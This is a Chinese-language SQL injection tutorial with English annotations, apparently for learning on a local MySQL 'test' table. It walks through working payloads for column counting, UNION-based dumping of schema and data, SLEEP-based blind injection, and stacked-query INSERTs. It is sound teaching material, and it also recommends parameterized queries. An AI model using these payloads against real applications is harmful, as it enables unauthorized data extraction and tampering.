SQL注入小案例
### 注入点：用 and 1=1 / and 1=2 判断是否存在注入；注释符 `-- `（MySQL 要求 `--` 后面必须跟一个空格，URL 中常写成 `--+`，`+` 解码后就是空格），`-- ` 之后的内容都会被当成注释；`#` 也可以作为注释符
-- Injection-point check. The trailing "--+''" is the form typed into a URL
-- parameter: "+" decodes to a space, so the server receives "-- ''" and the
-- application's closing quote is commented out. Pasted directly into a MySQL
-- client this line is NOT a comment: MySQL only treats "--" as a comment when
-- it is followed by whitespace, so "--+''" is parsed as an arithmetic
-- expression instead (with a different, unintended result).
SELECT * FROM test WHERE id = 1 AND NAME = 'Jack'--+''
-- Everything after "-- " is ignored, so the "ORDER BY4" tail never executes;
-- the statement behaves exactly like the un-injected query.
SELECT * FROM test WHERE id = 1 AND NAME = 'Jack' -- ORDER BY4
### 查询列数
-- Column-count probe. The trailing "'" stands for the closing quote the
-- application appends; "-- " comments it out. ORDER BY n fails once n exceeds
-- the number of columns in the SELECT list, so raising n until the query
-- errors reveals the column count the UNION payloads below must match.
SELECT * FROM test WHERE id = 1 AND NAME = 'Jack' ORDER BY 2 -- '
-- Expected to error: the UNION payloads in this file use two columns, which
-- suggests "test" has exactly two (id, NAME) -- confirm against the target.
SELECT * FROM test WHERE id = 1 AND NAME = 'Jack' ORDER BY 4 -- '
### 数据库名
-- Current database name via UNION. id = -1 makes the original WHERE match
-- nothing, so the only row returned is the injected one. The injected SELECT
-- must have the same number of columns as the original (two here). The outer
-- GROUP_CONCAT around DATABASE() is redundant for a single scalar; kept as-is.
-- NOTE(review): unlike the ORDER BY payloads above, no "-- '" terminator is
-- appended, so against an application that adds a closing quote this line
-- would need one.
SELECT * FROM test WHERE id = -1 AND NAME = 'Jack' UNION SELECT 1,(SELECT GROUP_CONCAT(DATABASE()))
#### 可以根据是否返回数据来判断表的字段数（UNION 两侧的列数必须一致，列数不匹配会直接报错）
-- Column-count check via UNION: the statement only succeeds when the injected
-- SELECT has as many columns as the original; a mismatch raises an error. With
-- id = -1 a success shows the literal row (1, 2), which also reveals which
-- positions are echoed back and can carry extracted data.
SELECT * FROM test WHERE id = -1 AND NAME = 'Jack' UNION SELECT 1,2
### 当前数据库的所有表名
-- Enumerate the table names of the current schema from information_schema.
-- GROUP_CONCAT folds every name into one string, so the subquery yields a
-- single row and the LIMIT 0,1 is redundant. The concatenated string is
-- truncated at the session's group_concat_max_len (default 1024 bytes); if
-- output looks cut off, drop GROUP_CONCAT and page with LIMIT n,1 instead.
SELECT * FROM test WHERE id = -1 AND NAME = 'Jack' UNION SELECT 1,(SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema=DATABASE() LIMIT 0,1)
### 所有字段名（下面的查询没有按 table_name 过滤，会把当前库所有表的字段名拼在一起）
-- Enumerate column names. There is no table_name filter, so this returns the
-- columns of every table in the current schema concatenated together, with no
-- indication of which table each belongs to. Add "AND table_name = 'test'"
-- (or a table found in the previous step) to scope it to one table.
-- Same group_concat_max_len truncation caveat as the table-name query.
SELECT * FROM test WHERE id = -1 AND NAME = 'Jack' UNION SELECT 1,(SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_schema=DATABASE() LIMIT 0,1)
### 字段中的数据
-- Dump the NAME column of "test". GROUP_CONCAT returns one row, so LIMIT 0,1
-- is again redundant; the output is subject to the same group_concat_max_len
-- truncation as above.
SELECT * FROM test WHERE id = -1 AND NAME = 'Jack' UNION SELECT 1,(SELECT GROUP_CONCAT(NAME) FROM test LIMIT 0,1)
### 时间盲注：插入时间函数（SLEEP），根据响应是否延迟来判断条件真假
-- Time-based blind injection. If the first character of the database name has
-- an ASCII code above 25, SLEEP(3) delays the response by about 3 s; otherwise
-- IF() yields 1 and the query returns immediately. The signal is the delay,
-- not the result rows: SLEEP() returns 0 on completion, so the AND filters the
-- row out whenever the condition holds. 25 is below every printable ASCII
-- code, so this particular payload always sleeps -- it only demonstrates the
-- mechanism. Real extraction narrows the threshold per character (binary
-- search over 32..126) and advances the SUBSTR offset one position at a time.
SELECT * FROM test WHERE id = 1 AND NAME = 'Jack' AND IF(ASCII(SUBSTR(DATABASE(),1,1))>25,SLEEP(3),1) -- '
### 堆叠注入：原理是数据库接口允许一次执行多条 SQL 语句。MySQL Connector/J 默认不允许多语句，只有在 JDBC URL 里显式加上 allowMultiQueries=true（如下）时，`;` 后面的第二条语句才会被执行；这个选项把"只能读"的注入升级为可执行任意 INSERT/UPDATE/DDL，生产环境应保持默认关闭，并用预编译参数绑定（PreparedStatement）从根本上消除注入。（原 URL 中的 serverTime 为笔误，Connector/J 的参数名是 serverTimezone。）
jdbc:mysql://localhost:3306/test?useUnicode=true&characterEncoding=utf-8&useSSL=true&serverTimezone=UTC&allowMultiQueries=true
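-- Stacked (multi-statement) injection. Requires the driver to accept several
-- statements in one call (allowMultiQueries=true in the JDBC URL above; the
-- option is off by default). Both "#" and "-- " comment out the application's
-- trailing quote.
SELECT * FROM test WHERE id = 1 AND NAME = 'Jack' ;SHOW TABLES;#-- '
SELECT * FROM test WHERE id = 1 AND NAME = 'Jack';SHOW TABLES;-- ';
-- Stacking turns a read-only injection into arbitrary writes: this appends a
-- row to "test". The column list is explicit (id, NAME -- the two columns the
-- ORDER BY / UNION probes above identified) so the payload does not depend on
-- column order, and "-- '" is appended for consistency with the other
-- payloads. Inserting id 9 assumes that key is free on the target -- confirm.
SELECT * FROM test WHERE id = 1 AND NAME = 'Jack'; INSERT INTO test (id, NAME) VALUES (9,'nono2') -- '
-- Two SELECTs stacked; the server executes the second one whether or not the
-- application displays its result set.
SELECT * FROM test WHERE id = 1 AND NAME = 'Jack';SELECT * FROM test WHERE id = 1;#-- '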